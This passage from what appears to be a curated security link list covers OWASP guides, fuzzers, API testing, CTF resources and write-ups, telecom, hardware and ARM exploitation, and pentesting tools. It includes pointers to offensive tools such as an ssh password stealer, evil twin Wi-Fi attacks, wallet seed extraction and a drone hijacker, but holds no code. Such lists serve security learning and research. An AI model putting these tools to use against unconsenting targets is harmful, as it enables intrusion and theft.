- [DependencyCheck](https://github.com/jeremylong/DependencyCheck): OWASP dependency-check is a software composition analysis utility that detects publicly disclosed vulnerabilities in application dependencies.
- [OWASP Risk Assessment Calculator](https://javierolmedo.github.io/OWASP-Calculator/). [code](https://github.com/JavierOlmedo/OWASP-Calculator)
- [OWASP Top 10 Proactive Controls 2018](https://owasp.org/www-project-proactive-controls/)
- [OWASP API Security Project](https://owasp.org/www-project-api-security/)
- [Exploiting OWASP Top 10 API Vulnerabilities](https://cyc0rpion.medium.com/exploiting-owasp-top-10-api-vulnerabilities-fb9d4b1dd471).
- [vAPI](https://github.com/roottusk/vapi) is Vulnerable Adversely Programmed Interface which is Self-Hostable API that mimics OWASP API Top 10 scenarios in the means of Exercises.
- CheatSheets:
- [CheatSheetSeries](https://github.com/OWASP/CheatSheetSeries/): The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific application security topics.
- [Password Storage Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html)
- [Database Security Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Database_Security_Cheat_Sheet.html)
- [OWASP Cornucopia](https://owasp.org/www-project-cornucopia/)
- [The 2021 CWE Most Important Hardware Weaknesses](https://cwe.mitre.org/scoring/lists/2021_CWE_MIHW.html)
- [secDevLabs](https://github.com/globocom/secDevLabs): A laboratory for learning secure web development in a practical manner.
- [Secure Modular Runtimes](https://guybedford.com/secure-modular-runtimes.html)
- [WebSecurity Academy](https://portswigger.net/web-security)
- [Prototype pollution – and bypassing client-side HTML sanitizers](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/)
- [Understanding the CSRF Vulnerability (A Beginner’s Guide)](https://www.hackingarticles.in/understanding-the-csrf-vulnerability-a-beginners-guide/)
- [VulnyCode](https://github.com/swisskyrepo/Vulny-Code-Static-Analysis): PHP Code Static Analysis. Python script to detect vulnerabilities inside PHP source code using static analysis, based on regex
- [PwnMachine](https://github.com/yeswehack/pwn-machine): PwnMachine is a self hosting solution based on docker aiming to provide an easy to use pwning station for bughunters.
- [WebSploit Labs](https://websploit.org/): is a learning environment created by Omar Santos for different Cybersecurity Ethical Hacking (Web Penetration Testing) training sessions.
- [Password Storage Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html)
- [Database Security Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Database_Security_Cheat_Sheet.html)
- [Introduction - OWASP Cheat Sheet Series](https://cheatsheetseries.owasp.org/)
- [Stop Password Masking](https://www.nngroup.com/articles/stop-password-masking/): Usability suffers when users type in passwords and the only feedback they get is a row of bullets. Typically, masking passwords doesn't even increase security, but it does cost you business due to login failures.
- [Forgot password? Taking over user accounts Kaminsky style](https://sec-consult.com/blog/detail/forgot-password-taking-over-user-accounts-kaminsky-style/)
- [CWE Top 25 Most Dangerous Software Weaknesses](https://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html)
- [Datashare Server Mode](https://github.com/ICIJ/datashare/wiki/Datashare-Server-Mode)
- [GitLab analysis of OWASP Top 10 changes from 2004 to 2021](https://public.flourish.studio/visualisation/7574790/)
- [oxAuth](https://github.com/GluuFederation/oxAuth): OAuth 2.0 server and client; OpenID Connect Provider (OP) & UMA Authorization Server (AS).
- [Prototype Pollution in Python](https://blog.abdulrah33m.com/prototype-pollution-in-python/)

### Formal Analysis

- [A Formal Analysis of IEEE 802.11's WPA2: Models and Proofs](https://cispa.saarland/group/cremers/tools/tamarin/WPA2/index.html). [paper](https://cispa.saarland/group/cremers/downloads/papers/WPA2-Usenix2020.pdf)/[video](https://2459d6dc103cb5933875-c0245c5c937c5dedcca3f1764ecc9b2f.ssl.cf2.rackcdn.com/sec20/videos/0812/s1_wireless_security/1_sec20winter-paper653-presentation-video-final.mp4)
- [SCYTHE's Community Threats Repository](https://github.com/scythe-io/community-threats): Share SCYTHE threats with the community. #ThreatThursday adversary emulation plans will be shared here.

### Fuzzing

- [Generating Software Tests](https://www.fuzzingbook.org/) ([github](https://github.com/uds-se/fuzzingbook/))
- [afl-unicorn](https://hackernoon.com/afl-unicorn-fuzzing-arbitrary-binary-code-563ca28936bf): Fuzzing Arbitrary Binary Code
- [Regaxor](https://github.com/0xSobky/Regaxor): A regular expression fuzzer
- [BrokenType](https://github.com/google/BrokenType): TrueType and OpenType font fuzzing toolset
- [Dizzy-legacy](https://github.com/ernw/dizzy-legacy): Network and USB protocol fuzzing toolkit.
- [Start-Hollow.ps1](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Start-Hollow.ps1): My musings with PowerShell
- [auditd-attack](https://github.com/bfuzzy/auditd-attack): A Linux Auditd rule set mapped to MITRE's Attack Framework
- [Dizzy-legacy](https://github.com/ernw/dizzy-legacy): Network and USB protocol fuzzing toolkit.
- [BFuzz](https://github.com/RootUp/BFuzz): Fuzzing Browsers
- [Structure-Aware Fuzzing with libFuzzer](https://github.com/google/fuzzer-test-suite/blob/master/tutorial/structure-aware-fuzzing.md) with [fuzzer test suite](https://github.com/google/fuzzer-test-suite)
- [Fuzzilli](https://github.com/googleprojectzero/fuzzilli): A JavaScript Engine Fuzzer.
- [Materials from Fuzzing Bay Area meetups](https://github.com/MotherFuzzers/meetups).
- [javafuzz](https://github.com/fuzzitdev/javafuzz): Javafuzz is coverage-guided fuzzer for testing Java packages.
- [onefuzz](https://github.com/microsoft/onefuzz): A self-hosted Fuzzing-As-A-Service platform.
- [Fuzzing Like A Caveman 3: Trying to Somewhat Understand The Importance Code Coverage](https://h0mbre.github.io/Fuzzing-Like-A-Caveman-3/#)
- [ffuf](https://github.com/ffuf/ffuf): Fast web fuzzer written in Go
- [rFuss2](https://github.com/carstein/rfuss2): Simple rust fuzzer
- [RESTler finds security and reliability bugs through automated fuzzing](https://www.microsoft.com/en-us/research/blog/restler-finds-security-and-reliability-bugs-through-automated-fuzzing/). [RESTler](https://github.com/microsoft/restler-fuzzer): is the first stateful REST API fuzzing tool for automatically testing cloud services through their REST APIs and finding security and reliability bugs in these services. [REST API Fuzz Testing (RAFT)](https://github.com/microsoft/rest-api-fuzz-testing): Source code for self-hosted service developed for Azure, including the API, orchestration engine, and default set of security tools (including MSR's RESTler), that enables developers to embed security tooling into their CI/CD workflows.
- [Jackalope](https://github.com/googleprojectzero/Jackalope): Binary, coverage-guided fuzzer for Windows and macOS
- [Dynamic Program Analysis](https://linuxfoundation.org/wp-content/uploads/Dynamic-program-analysis_-LF-Mentorship.pdf) by Dmitry Vyukov:
- Bug Detection: ASAN, MSAN, TSAN (C++, Go, Java), KCSAN, LSAN, UBSAN
- Bug Provocation: LibFuzzer (C++ [go, rust]), go-fuzz(go), syzkaller (kernels)
- Production Hardening: CFI, SafeStack, ShadowCallStack, HWASAN, Memory Tagging(MTE), GWP-ASan, KFENCE
- Misc: OSS-Fuzz, syzbot, SanitizerCovereage, KCOV,
- [Fuzzing the Linux Kernel](https://linuxfoundation.org/wp-content/uploads/2021-Linux-Foundation-Mentorship-Series_-Fuzzing-the-Linux-Kernel.pdf) by Andrey Konovalov.
- [Fuzzing sockets: Apache HTTP, Part 2: Custom Interceptors](https://securitylab.github.com/research/fuzzing-apache-2/)
- [AFLplusplus](https://github.com/AFLplusplus/AFLplusplus): The fuzzer afl++ is afl with community patches, qemu 5.1 upgrade, collision-free coverage, enhanced laf-intel & redqueen, AFLfast++ power schedules, MOpt mutators, unicorn_mode, and a lot more!
- [s a n d s i f t e r](https://github.com/Battelle/sandsifter): The x86 processor fuzzer.
- [sandsifter](https://github.com/Battelle/sandsifter): The x86 processor fuzzer.
- [Fuzzing-101](https://github.com/antonio-morales/Fuzzing101): Do you want to learn how to fuzz like a real expert, but don't know how to start?
- [The Challenges of Fuzzing 5G Protocols](https://research.nccgroup.com/2021/10/11/the-challenges-of-fuzzing-5g-protocols/)
- [Fuzzing Workshops](http://fuzzing.in/)
- [AFLNet](https://github.com/aflnet/aflnet): A Greybox Fuzzer for Network Protocols.
- [ClusterFuzz](https://google.github.io/clusterfuzz/): is a scalable fuzzing infrastructure that finds security and stability issues in software.
- [Introduction to VirtualBox security research](https://blog.doyensec.com/2022/04/26/vbox-fuzzing.html)

### API

- [The Web API Checklist](https://mathieu.fenniak.net/the-api-checklist/): 43 Things To Think About When Designing, Testing, and Releasing your API
- [API-Security-Checklist](https://github.com/shieldfy/API-Security-Checklist): Checklist of the most important security countermeasures when designing, testing, and releasing your API
- [REST API Checklist](https://www.kennethlange.com/rest-api-checklist/)
- [Your Comprehensive Web API Design Checklist](https://www.phase2technology.com/blog/your-comprehensive-web-api-design-checklist)
- [API Security Testing](https://www.testbytes.net/blog/api-security-testing-rules-and-checklist/): Rules And Checklist
- API Security Testing - How to Hack an API and Get Away with It:
- [Part 1 of 3](https://smartbear.com/blog/test-and-monitor/api-security-testing-how-to-hack-an-api-part-1/)
- [Part 2 of 3](https://smartbear.com/blog/test-and-monitor/api-security-testing-how-to-hack-an-api-part-2/)
- [Part 3 of 3](https://smartbear.com/blog/test-and-monitor/api-security-testing-how-to-hack-an-api-part-3/)
- [API Security Checklist](https://github.com/shieldfy/API-Security-Checklist): Checklist of the most important security countermeasures when designing, testing, and releasing your API
- [Istio](https://github.com/istio/istio): An open platform to connect, manage, and secure microservices.
- [How to contact Google SRE: Dropping a shell in cloud SQL](https://offensi.com/2020/08/18/how-to-contact-google-sre-dropping-a-shell-in-cloud-sql/)
- [hack-requests](https://github.com/boy-hack/hack-requests): The hack-requests is an http network library for hackers
- [Free API and Microservice Books](https://apiacademy.co/api-books/)
- [MindAPI](https://github.com/dsopas/MindAPI): Organize your API security assessment by using MindAPI. It's free and open for community collaboration.
- [OWASP API Security Project](https://owasp.org/www-project-api-security/)
- [Here you can find a variaty of resources to help you out on the API security path.](https://dsopas.github.io/MindAPI/references/)
- [Introducing vAPI – an open source lab environment to learn about API security](https://portswigger.net/daily-swig/introducing-vapi-an-open-source-lab-environment-to-learn-about-api-security)

#### REST

- [REST API Testing Tutorial](https://www.guru99.com/testing-rest-api-manually.html): Sample Manual Test Case
- [REST Security Cheat Sheet](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/REST_Security_Cheat_Sheet.md): CheatSheetSeries
- [Penetration Testing RESTful Web Services](http://blog.isecurion.com/2017/10/10/penetration-testing-restful-web-services/)
- [RESTful web services penetation testing](https://hydrasky.com/network-security/restful-web-services-penetation-testing/)
- [Astra](https://tech.flipkart.com/astra-automated-security-testing-for-rest-apis-a54b999dbfe9?gi=2af3bebcabc8): Automated Security Testing for REST API’s
- [bad_json_parsers](https://github.com/lovasoa/bad_json_parsers): Exposing problems in json parsers of several programming languages.

## CTFs

- CTFd:
- [Deploying CTFd](https://nopresearcher.github.io/Deploying-CTFd/)
- [CTFd Tips](https://nopresearcher.github.io/CTFd-tips/)
- [Mellivora](https://github.com/Nakiami/mellivora) is a CTF engine written in PHP
- [Boss of the SOC (BOTS) Dataset Version 3](https://github.com/splunk/botsv3)
- [SA-ctf_scoreboard](https://github.com/splunk/SA-ctf_scoreboard)
- [The fast, easy, and affordable way to train your hacking skills.](https://www.root-me.org/)
- [Write-ups for crackmes and CTF challenges](https://github.com/eleemosynator/writeups) by eleemosynator
- [pwntools](https://github.com/Gallopsled/pwntools): CTF framework and exploit development library
- [google-ctf](https://github.com/google/google-ctf)
- [Pwn2Win 2018](https://www.reddit.com/r/securityCTF/comments/a2q4oj/pwn2win_2018_unsolved_tasks_part_1/). [unsolved](https://static.pwn2win.party/unsolved-pt1.txt)
- [Leap Security](https://leapsecurity.io/)
- [35c3ctf-challs](https://github.com/niklasb/35c3ctf-challs)
- [ctf-tasks](https://github.com/j00ru/ctf-tasks): An archive of low-level CTF challenges developed over the years.
- [$50 million CTF Writeup](https://github.com/manoelt/50M_CTF_Writeup).
- [Alice sent Bob a meme](https://blog.bi0s.in/2019/03/12/Crypto/Elliptic-Curves/utctf19-alicebob/) - UTCTF 2019. tl;dr: Extract data from given images using binwalk, Tranform given diophantine equation into a cubic curve and retrieve EC parameters, Solve ECDLP given in extracted data using Pohlig Hellman Algorithm.
- [RsaCtfTool](https://github.com/Ganapati/RsaCtfTool): RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data
- [RECOVERING A FULL PEM PRIVATE KEY WHEN HALF OF IT IS REDACTED](https://blog.cryptohack.org/twitter-secrets)
- [BalsnCTF-2019](https://github.com/CykuTW/My-CTF-Challenges) by CykuTW
- [HackTheBox CTF Cheatsheet](https://github.com/Ignitetechnologies/HackTheBox-CTF-Writeups): This cheasheet is aimed at the CTF Players and Beginners to help them sort Hack The Box Labs on the basis of Operating System and Difficulty.
- [Mumbai:1 Vulnhub Walkthrough](https://www.hackingarticles.in/)
- [0x0G 2020 CTF](https://findaflag.net/challenges/)
- [FIRST SecLounge CTF 2020 Solutions](https://cujo.com/first-seclounge-ctf-2020-solutions/)
- [Hitcon2017CTF - 家徒四壁~Everlasting Imaginative Void~](https://ulexec.github.io/ulexec.github.io/writeup/2017/11/03/HitconCTF2017-Everlasting-Imaginative-Void.html)
- [r2dec](https://ctf.radare.org/welcome.html)
- [SASatHome](https://twitter.com/TheSAScon/status/1311585618250682370)
- [Crypton](https://github.com/ashutosh1206/Crypton): Library consisting of explanation and implementation of all the existing attacks on various Encryption Systems, Digital Signatures, Key Exchange, Authentication methods along with example challenges from CTFs.
- [Bash injection without letters or numbers - 33c3ctf hohoho](https://www.youtube.com/watch?v=6D1LnMj0Yt0&feature=youtu.be)
- [Writeup CTF - Web API Exploitation](https://www.youtube.com/watch?v=wK7GszL5P5U&feature=youtu.be)
- [Closing Capture the Flag Session & Winning Team Presentation](https://www.youtube.com/watch?v=IlbjnsMlGgk)
- [attack & defense CTF demo](https://github.com/patrickwire/attack-defense-CTF-demo)
- [Deploying CTFd](https://nopresearcher.github.io/Deploying-CTFd/).
- [ctftool](https://github.com/taviso/ctftool): Interactive CTF Exploration Tool.
- [CTF-Writeups](https://github.com/team0se7en/CTF-Writeups): writeups for Capture The Flag Competitions.
- [Capture the Flag](https://capturetheflag.com.br/)
- [DEF CON CTF 2021 QUALS](https://oooverflow.io/dc-ctf-2021-quals/) and [finals](https://oooverflow.io/dc-ctf-2021-finals/), [files](https://github.com/o-o-overflow)
- [eDump](https://oxidized-scissor-607.notion.site/Write-up-eDump-0018085e506548e7b0d9cfbf517799a8)
- [HITB SECCCONF EDU CTF 2021](https://github.com/HITB-CyberWeek/hitbsecconf-ctf-2021): Developed with  by Hackerdom team and HITB.
- [Planilhas Baby](https://bigous.me/write-ups/latinoware2021/planilhasbaby.html) - Latinoware CTF 2021
- [CTF KAVACON 21 – LUZ ROJA, LUZ VERDE](https://dragonsec.info/2021/10/21/ctf-kavacon-21-luz-roja-luz-verde/)
- [RET2 WarGames](https://wargames.ret2.systems/)
- (es) [CTF: Aprende «hacking» jugando](https://www.sothis.tech/capture-the-flag-aprende-hacking-jugando/)
- (es) [HackLab #1](http://labs.gf0s.com/R1cde3/r1-index.html)
- [Penetration testing laboratories "Test lab"](https://lab.pentestit.ru/) emulate an IT infrastructure of real companies and are created for a legal pen testing and improving penetration testing skills.
- [Solving Zden’s “1BiTCoiN WHiTe PaPeR” Puzzle](https://jtobcat.medium.com/solving-zdens-1bitcoin-white-paper-puzzle-6ffa4963e1a2)

### CTFs tools

- [CTFs-Exploits](https://github.com/bing0o/CTFs-Exploits)
- [nc-chat-ctf](https://github.com/mosesrenegade/nc-chat-ctf): Chat Server for CTF Players wrapped in SSL.
- [thg-framework](https://github.com/darkcode357/thg-framework)
- [Super-Guesser-ctf](https://github.com/Super-Guesser/ctf)
- [Ciphr](https://github.com/frohoff/ciphr): CLI crypto swiss-army knife for performing and composing encoding, decoding, encryption, decryption, hashing, and other various cryptographic operations on streams of data from the command line; mostly intended for ad hoc, infosec-related uses.
- [sec-tools](https://github.com/eugenekolo/sec-tools): A set of security related tools.
- [Real World CTF 2023](https://gist.github.com/stong/5236143fdb6a3b656ac295e534988902): Solving a Java CTF challenge by writing static analysis passes!

## Phreak

- [ss7MAPer](https://n0where.net/ss7-pentesting-toolkit-ss7maper) ([github](https://github.com/ernw/ss7MAPer))
- [Into the wild: Gaining access to SS7 - Part 1: Finding an access point](https://0x00sec.org/t/into-the-wild-gaining-access-to-ss7-part-1-finding-an-access-point/12418)
- [SCTP/SIGTRAN & SS7 Overview](https://sharkfestus.wireshark.org/sharkfest.08/T1-12_Tuexen_SCTP_SIGTRAN%20and%20SS7.pdf)
- [Security Penetration Test Framework for the Diameter Protocol](https://arxiv.org/ftp/arxiv/papers/1407/1407.6508.pdf)
- [Signaling Security in LTE Roaming](https://core.ac.uk/download/pdf/199295321.pdf)
- [Phrack](http://phrack.org/issues/70/1.html)

## Archs

- ARM [LAB ENVIRONMENT](https://azeria-labs.com/arm-lab-vm/)
- Azure IoT [HUB](https://azure.microsoft.com/en-us/services/iot-hub/)
- [A collection of vulnerable ARM binaries for practicing exploit development](https://github.com/Billy-Ellis/Exploit-Challenges)
- [arm vm working out of the box for everyone](https://github.com/nongiach/arm_now)
- [Statically compiled ARM binaries for debugging and runtime analysis.](https://github.com/therealsaumil/static-arm-bins/)
- [Hacker Finds Hidden 'God Mode' on Old x86 CPUs](https://www.tomshardware.com/news/x86-hidden-god-mode,37582.html) -> [rosenbridge](https://github.com/xoreaxeaxeax/rosenbridge): Hardware backdoors in some x86 CPUs
- [USBHarpoon](https://www.bleepingcomputer.com/news/security/usbharpoon-is-a-badusb-attack-with-a-twist/) Is a BadUSB Attack with A Twist
- Ground Zero: Part 3-2 [Patching Binaries with Radare2 - ARM64](https://scriptdotsh.com/index.php/2018/08/13/reverse-engineering-patching-binaries-with-radare2-arm-aarch64/)
- [A 2018 practical guide to hacking RFID/NFC](https://www.slideshare.net/SlawomirJasek/a-2018-practical-buide-to-hacking-rfidnfc)
- [riscv-ida](https://github.com/lcq2/riscv-ida): RISC-V ISA processor module for IDAPro 7.x
- [mac-age](https://github.com/hdm/mac-ages): MAC address age tracking
- [Lexra](https://www.linux-mips.org/wiki/Lexra): Lexra did implement a 32-bit variant of the MIPS architecture.
- [IntelTEX-PoC](https://github.com/ptresearch/IntelTXE-PoC): Intel Management Engine JTAG Proof of Concept
- [me_cleaner](https://github.com/corna/me_cleaner): Tool for partial deblobbing of Intel ME/TXE firmware images.
- [Potential candidate for open source bootloaders? Complete removal of Intel ME firmware possible on certain Intel HEDT/Server platforms](https://www.reddit.com/r/linux/comments/byyxow/potential_candidate_for_open_source_bootloaders/)
- [IDA-scripts](https://github.com/secrary/IDA-scripts/): IDAPro scripts/plugins
- [Something about IR optimization](https://brrt-to-the-future.blogspot.com/2019/03/something-about-ir-optimization.html): Hi hackers! Today I want to write about optimizing IR in the MoarVM JIT, and also a little bit about IR design itself.
- [Dragonblood](https://wpa3.mathyvanhoef.com/): Analysing WPA3's Dragonfly Handshake
- [The Hacker's Hardware Toolkit](https://github.com/yadox666/The-Hackers-Hardware-Toolkit): The best hacker's gadgets for Red Team pentesters and security researchers.
- [Unfixable Seed Extraction on Trezor](https://ledger-donjon.github.io/Unfixable-Key-Extraction-Attack-on-Trezor/) - A practical and reliable attack. An attacker with a stolen device can extract the seed from the device. It takes less than 5 minutes and the necessary materials cost around 100$.
- [Extracting seed from Ellipal wallet](https://ledger-donjon.github.io/Ellipal-Security/)
- [Breaking Trezor One with Side Channel Attacks](https://ledger-donjon.github.io/Breaking-Trezor-One-with-SCA/): A Side Channel Attack on PIN verification allows an attacker with a stolen Trezor One to retrieve the correct value of the PIN within a few minutes.
- [Rewriting Functions in Compiled Binaries](https://blog.trailofbits.com/2019/09/02/rewriting-functions-in-compiled-binaries/)
- [Deep Dive](https://software.intel.com/security-software-guidance/insights/deep-dive-machine-check-error-avoidance-page-size-change-0): Machine Check Error Avoidance on Page Size Change.
- [Saleae](https://www.saleae.com/downloads/#home-tech-specs__wrapper): Saleae logic analyzers are used by electrical engineers, firmware developers, enthusiasts, and engineering students to record, measure, visualize, and decode the signals in their electrical circuits. [downloads](https://ideas.saleae.com/f/changelog/)
- [wacker](https://github.com/blunderbuss-wctf/wacker): A WPA3 dictionary cracker.
- [Osiris](https://publications.cispa.saarland/3431/1/main.pdf): [Automated Discovery ofMicroarchitectural Side Channels](https://github.com/cispa/osiris)
- [One Glitch to Rule Them All: Fault Injection Attacks Against AMD's Secure Encrypted Virtualization](https://arxiv.org/abs/2108.04575)

### Hardware

- [Wifi-Ducky-ESPUSB](https://github.com/tempestsecurity/Wifi-Ducky-ESPUSB)
- [USB Attacks: Past, Present and Future](https://www.slideshare.net/RoganDawes/confidence-2020), [P4wnP1 Covert Channel demo](https://www.youtube.com/watch?v=T6Qhl-VTYuo&feature=youtu.be) - P4wnP1 is below on pentesting section. [wrap-up here](https://twitter.com/RoganDawes/status/1303297634858393608)
- [PLATYPUS](https://platypusattack.com/): With PLATYPUS, we present novel software-based power side-channel attacks on Intel server, desktop and laptop CPUs.
- [VoltPillager](https://www.usenix.org/system/files/sec21summer_chen-zitai.pdf): Hardware-based fault injection attacks against Intel SGX Enclaves using the SVID voltage scaling interface
- [Analyzing a buffer overflow in the DLINK DIR-645 with Qiling framework, Part I](https://github.com/nahueldsanchez/blogpost_qiling_dlink_1)
- [ToorCon 14 Badge](https://greatscottgadgets.com/tc14badge/), and [ToorChat](https://github.com/hathcox/ToorChat).
- [HammerKit](https://github.com/google/hammer-kit): HammerKit is an open-source library for inducing and characterizing rowhammer that provides out-of-the-box support for Chrome OS platforms.
- [Evil Logitech](https://luemmelsec.github.io/Building-An-Evil-USB-Cable/) - erm I ment USB cable. [USB Samurai](https://infosecwriteups.com/usbsamurai-a-remotely-controlled-malicious-usb-hid-injecting-cable-for-less-than-10-ebf4b81e1d0b?gi=ade3f719f778) [For Dummies](https://infosecwriteups.com/usbsamurai-for-dummies-4bd47abf8f87)
- [Hacker's guide to deep-learning side-channel attacks: the theory](https://elie.net/blog/security/hacker-guide-to-deep-learning-side-channel-attacks-the-theory/). [SCAAML](https://github.com/google/scaaml): Side Channel Attacks Assisted with Machine Learning
- [Guarding Against Physical Attacks: The Xbox One Story](https://www.platformsecuritysummit.com/2019/speaker/chen/)
- [Common BMC vulnerabilities and how to avoid repeating them](https://www.youtube.com/watch?app=desktop&v=QrcdHHsfaKQ), [the unbearable lightness of BMC](https://i.blackhat.com/us-18/Wed-August-8/us-18-Waisman-Soler-The-Unbearable-Lightness-of-BMC.pdf) [Perilous Peripherals: The Hidden Dangers Inside Windows & Linux Computers](https://eclypsium.com/2020/2/18/unsigned-peripheral-firmware/)
- Blutetooth:
- [BLEAH](https://github.com/evilsocket/bleah): A BLE scanner for "smart" devices hacking.
- [BrakTooth](https://asset-group.github.io/disclosures/braktooth/): Causing Havoc on Bluetooth Link Manager. [news and sources](https://isc.sans.edu/forums/diary/BrakTooth+Impacts+Implications+and+Next+Steps/27802/)
- [Breaking the Bluetooth Pairing: Fixed Coordinate Invalid Curve Attack](https://www.cs.technion.ac.il/~biham/BT/)
- [The Practical Guide to Hacking Bluetooth Low Energy](https://blog.attify.com/the-practical-guide-to-hacking-bluetooth-low-energy/)
- [A Practical Guide to BLE Throughput](https://interrupt.memfault.com/blog/ble-throughput-primer)
- [Exploiting IoT enabled BLE smart bulb security](https://blog.attify.com/exploiting-iot-enabled-ble-smart-bulb-security/)
- Wireless / Wifi:
- [ESP8266 Deauther Version 2](https://github.com/SpacehuhnTech/esp8266_deauther): Scan for WiFi devices, block selected connections, create dozens of networks and confuse WiFi scanners!
- [Airspy-Utils](https://github.com/kholia/airspy-utils): is a small software collection to help with firmware related operations on Airspy HF+ devices.
- [infernal-twin](https://github.com/entropy1337/infernal-twin): wireless hacking - This is automated wireless hacking tool
- [Cracking WiFi at Scale with One Simple Trick](https://www.cyberark.com/resources/threat-research-blog/cracking-wifi-at-scale-with-one-simple-trick)
- [hcxdumptool](https://github.com/ZerBea/hcxdumptool): small tool to capture packets from wlan devices.
- Drone:
- [SkyJack](http://www.samy.pl/skyjack/) is a drone engineered to autonomously seek out, hack, and wirelessly take over other drones within wifi distance, creating an army of zombie drones under your control. [git repo](https://github.com/samyk/skyjack)
- [eaphammer](https://github.com/s0lst1c3/eaphammer): Targeted evil twin attacks against WPA2-Enterprise networks. Indirect wireless pivots using hostile portal attacks.
- [whereami](https://github.com/kootenpv/whereami): Uses WiFi signals and machine learning to predict where you are.
- Car Hacking:
- [Car hijacking swapping a single bit](https://www.synacktiv.com/publications/car-hijacking-swapping-a-single-bit.html)
- [Hacking a VW Golf Power Steering ECU](https://blog.willemmelching.nl/carhacking/2022/01/02/vw-part1/) - Part 1, [Part 2](https://blog.willemmelching.nl/carhacking/2022/01/02/vw-part2/) [Part 3](https://blog.willemmelching.nl/carhacking/2022/01/02/vw-part3/) and [Part 4](https://blog.willemmelching.nl/carhacking/2022/01/02/vw-part4/). [VW PQ35 EPS flasher](https://github.com/pd0wm/pq-flasher)
- Internet of Things (IoT):
- [BMC-Tools](https://github.com/ANSSI-FR/bmc-tools): RDP Bitmap Cache parser.
- [Hacking Printers Wiki](http://hacking-printers.net/wiki/index.php/Main_Page)
- [Full key extraction of NVIDIA™ TSEC](https://gist.githubusercontent.com/plutooo/733318dbb57166d203c10d12f6c24e06/raw/15c5b2612ab62998243ce5e7877496466cabb77f/tsec.txt)
- [The x86 architecture is the weirdo, part 2](https://devblogs.microsoft.com/oldnewthing/20220418-00/?p=106489)
- [Dark Flipper](https://github.com/DarkFlippers/unleashed-firmware): Flipper Zero Unleashed Firmware
- [Reverse Engineering Yaesu FT-70D Firmware Encryption](https://landaire.net/reversing-yaesu-firmware-encryption/)
- [Reverse-engineering an airspeed/Mach indicator from 1977](https://www.righto.com/2023/01/reverse-engineering-airspeedmach.html)
- [Stepping Insyde System Management Mode](https://research.nccgroup.com/2023/04/11/stepping-insyde-system-management-mode/): Intel’s Alder Lake BIOS source code was [leaked online](https://git.tcp.direct/TheParmak/ICE_TEA_BIOS).

### ARM

- Arm Heap Exploitation, by Azeria:
- [AZM Online Arm Assembler](https://azm.azerialabs.com/)
- Part 1: [Understanding the Glibc Heap Implementation](https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/)
- Part 2: [Understanding the GLIBC Heap Implementation](https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/)
- [Heap Exploit Development](https://azeria-labs.com/heap-exploit-development-part-1/)– Case study from an in-the-wild iOS 0-day. [thread](https://threader.app/thread/1168969597799866368)
- [ARM64 Reversing and Exploitation](http://highaltitudehacks.com/) by [prateekg147](https://twitter.com/prateekg147):
- Part 1 - [ARM Instruction Set + Simple Heap Overflow](http://highaltitudehacks.com/2020/09/05/arm64-reversing-and-exploitation-part-1-arm-instruction-set-heap-overflow/)
- Part 2 - [Use After Free](http://highaltitudehacks.com/2020/09/06/arm64-reversing-and-exploitation-part-2-use-after-free/)
- Part 3 - [A Simple ROP Chain](http://highaltitudehacks.com/2020/09/06/arm64-reversing-and-exploitation-part-3-a-simple-rop-chain/)

## Pentesting

- [Awesome Penetration Testing](https://github.com/enaqx/awesome-pentest): A collection of awesome penetration testing resources, tools and other shiny things.
- [Seclists](https://github.com/danielmiessler/SecLists) is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place.
- Search operating systems on the network: [osquery](https://osquery.io/downloads/)
- [osquery Across the Enterprise](https://medium.com/@palantir/osquery-across-the-enterprise-3c3c9d13ec55)
- [fleet](https://github.com/fleetdm/fleet): The premier osquery [fleet manager](https://fleetdm.com/).
- Penetration Testing Cheat Sheet For Windows Machine – [Intrusion Detection](https://techincidents.com/penetration-testing-cheat-sheet/)
- Zero Day Zen Garden:
- Windows Exploit Development - [Part 0](http://www.shogunlab.com/blog/2017/08/11/zdzg-windows-exploit-0.html)
- Windows Exploit Development - [Part 1](http://www.shogunlab.com/blog/2017/08/19/zdzg-windows-exploit-1.html)
- Windows Exploit Development - [Part 2](http://www.shogunlab.com/blog/2017/08/26/zdzg-windows-exploit-2.html)
- Windows Exploit Development - [Part 3](http://www.shogunlab.com/blog/2017/09/02/zdzg-windows-exploit-3.html)
- Windows Exploit Development - [Part 4](http://www.shogunlab.com/blog/2017/11/06/zdzg-windows-exploit-4.html)
- [Got Meterpreter? PivotPowPY!](https://pen-testing.sans.org/blog/2017/03/03/got-meterpreter-pivotpowpy/)
- [Pentest Tips and Tricks](https://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/)
- [Script to steal passwords from ssh.](https://github.com/mthbernardes/sshLooter)
- [Network Infrastructure Penetration Testing Tool](https://github.com/SECFORCE/sparta)
- [tcp connection hijacker](https://github.com/kpcyrd/rshijack)
- ["EAST" PENTEST FRAMEWORK](http://eastfw.com/)
- [Pown.js](https://github.com/pownjs/pown): is the security testing an exploitation framework built on top of Node.js and NPM.
- [Sandmap](https://github.com/trimstray/sandmap) is a tool supporting network and system reconnaissance using the massive Nmap engine.
- [trackerjacker](https://github.com/calebmadrigal/trackerjacker): Like nmap for mapping wifi networks you're not connected to, plus device tracking
- [TIDoS-Framework](https://github.com/theInfectedDrake/TIDoS-Framework): The offensive web application penetration testing framework.
- [GitMiner](https://github.com/UnkL4b/GitMiner): Tool for advanced mining for content on Github
- [DHCPwn](https://github.com/mschwager/dhcpwn): All your IPs are belong to us.
- [badKarma](https://github.com/r3vn/badKarma): advanced network reconnaissance toolkit.
- [Danger-zone](https://github.com/woj-ciech/Danger-zone): Correlate data between domains, IPs and email addresses, present it as a graph and store everything into Elasticsearch and JSON files.
- [go-tomcat-mgmt-scanner](https://github.com/edermi/go-tomcat-mgmt-scanner): A simple scanner to find and brute force tomcat manager logins
